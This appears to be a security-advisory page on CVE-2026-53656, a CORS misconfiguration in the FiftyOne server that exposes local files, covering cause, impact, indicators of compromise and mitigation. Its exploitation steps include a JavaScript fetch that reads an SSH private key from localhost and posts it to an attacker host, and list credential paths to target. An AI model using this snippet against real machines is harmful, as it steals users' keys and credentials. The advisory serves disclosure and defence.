CVE-2026-53656
Python Análise e mitigação de vulnerabilidades

Visão geral

CVE-2026-53656 is a permissive CORS misconfiguration vulnerability in the FiftyOne App/API server that enables drive-by data exfiltration from a user's local machine. Both fiftyone/server/app.py and the /media route (fiftyone/server/routes/media.py) unconditionally set Access-Control-Allow-Origin: *, allowing any website to make cross-origin requests to the locally running, unauthenticated FiftyOne server and read the responses. All versions of the fiftyone pip package prior to 1.17.0 are affected. The advisory was published on June 4, 2026, and added to the GitHub Advisory Database on July 15, 2026. It carries a CVSS v3.1 base score of 6.3 (Medium) (GitHub Advisory, Voxel51 Advisory).

Detalhes técnicos

The root cause is an origin validation error (CWE-346) combined with a permissive cross-domain policy with untrusted domains (CWE-942): both app.py and media.py hard-coded Access-Control-Allow-Origin: * in their response headers, bypassing the browser's same-origin policy for all cross-origin requestors. The unauthenticated /media endpoint accepts a filepath query parameter and serves arbitrary files from the local filesystem, so a malicious page can issue a fetch to http://localhost:5151/media?filepath=/etc/passwd (or any other path) and read the full response. No authentication, credentials, or prior access to the victim's machine are required — the only precondition is that the victim has a FiftyOne server running locally (default port 5151) and visits an attacker-controlled web page. Browsers implementing Private Network Access (e.g., Chromium 142+) partially mitigate the attack, but Safari and Firefox do not yet enforce these protections (GitHub Advisory, Voxel51 Advisory).

Impacto

Successful exploitation results in high confidentiality impact with no integrity or availability impact. An attacker who lures a victim to a malicious web page can silently exfiltrate arbitrary local files readable by the FiftyOne server process — including SSH private keys, cloud provider credentials, .env files, and dataset media — to an attacker-controlled endpoint. Because the /media endpoint accepts arbitrary filesystem paths, the scope of data exposure extends beyond FiftyOne datasets to any file accessible to the server process user account. Media stored in cloud buckets served via signed URLs on a separate origin is not affected (GitHub Advisory).

Etapas de exploração

  1. Reconnaissance: Identify potential victims who use FiftyOne locally (e.g., data scientists, ML engineers). The FiftyOne server listens on localhost:5151 by default.
  2. Craft malicious page: Create a web page containing JavaScript that issues a cross-origin fetch to the FiftyOne server, e.g.:
fetch('http://localhost:5151/media?filepath=/home/user/.ssh/id_rsa')
  .then(r => r.text())
  .then(data => fetch('https://attacker.example.com/exfil', {method:'POST', body: data}));
  1. Lure the victim: Deliver the malicious page via phishing email, malicious ad, or compromised website. The victim must have a FiftyOne server running locally and be using a browser without Private Network Access enforcement (e.g., Safari or Firefox).
  2. Automatic execution: When the victim's browser loads the page, the fetch executes silently. Because the FiftyOne server responds with Access-Control-Allow-Origin: *, the browser permits the cross-origin read.
  3. Exfiltrate data: The response body (file contents) is forwarded to the attacker's server. The attacker can iterate over known sensitive paths (/etc/passwd, ~/.aws/credentials, ~/.env, SSH keys, etc.) to maximize data collection (GitHub Advisory, Voxel51 Advisory).

Indicadores de compromisso

  • Network: Outbound HTTP POST or GET requests from the victim's machine to unknown external endpoints shortly after the FiftyOne server receives unusual /media requests; unexpected cross-origin requests to localhost:5151 visible in browser developer tools or local proxy logs.
  • Logs: FiftyOne server access logs showing repeated GET /media?filepath= requests with sensitive filesystem paths (e.g., /etc/passwd, /.ssh/id_rsa, /.aws/credentials, /.env) from 127.0.0.1 or ::1 with a browser User-Agent string (indicating browser-originated requests rather than direct API calls).
  • File System: No direct file system artifacts are created by exploitation, as the attack is read-only and in-memory within the browser context.
  • Process: No unusual child processes; exploitation occurs entirely within the FiftyOne server's normal request-handling flow (GitHub Advisory).

Mitigação e soluções alternativas

Upgrade to FiftyOne 1.17.0 or later, which removes the hard-coded Access-Control-Allow-Origin: * header and defaults to same-origin-only responses (FiftyOne Release). If cross-origin access is legitimately required, configure specific trusted origins via the new FIFTYONE_ALLOWED_ORIGINS environment variable (e.g., export FIFTYONE_ALLOWED_ORIGINS='https://trusted.example.com'); setting it to * restores the vulnerable behavior and emits a warning. For users unable to upgrade immediately: do not run the FiftyOne App server while browsing untrusted websites, keep the server bound to localhost (the default), and prefer browsers with Private Network Access enforcement such as Chromium 142+ (Voxel51 Advisory).

Reações da comunidade

The advisory was published by Voxel51 maintainer benjaminpkane on June 4, 2026, with credited finders vittorio-prodomo and AAtomical, and remediation contributors mo-getter, kevin-dimichel, and AdonaiVera. No significant external media coverage or notable researcher commentary beyond the official advisory has been identified at this time (GitHub Advisory).

Recursos adicionais


OrigemEste relatório foi gerado usando IA

Relacionado Python Vulnerabilidades:

CVE ID

Gravidade

Pontuação

Tecnologias

Nome do componente

Exploração do CISA KEV

Tem correção

Data de publicação

GHSA-r3hx-x5rh-p9vvHIGH8.7
  • Python logoPython
  • django-haystack
NãoSimJul 15, 2026
CVE-2026-54457HIGH7.7
  • Python logoPython
  • tensorzero
NãoSimJul 15, 2026
CVE-2026-50271HIGH7.5
  • Python logoPython
  • ddtrace
NãoSimJul 15, 2026
CVE-2026-54254MEDIUM6.9
  • Python logoPython
  • cyberdrop-dl-patched
NãoSimJul 15, 2026
CVE-2026-53656MEDIUM6.3
  • Python logoPython
  • fiftyone
NãoSimJul 15, 2026

Avaliação de vulnerabilidade gratuita

Compare sua postura de segurança na nuvem

Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.

Solicitar avaliação

Marque uma demonstração personalizada

Pronto para ver a Wiz em ação?

"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
David EstlickCISO
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
Adão FletcherDiretor de Segurança
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."
Greg PoniatowskiChefe de Gerenciamento de Ameaças e Vulnerabilidades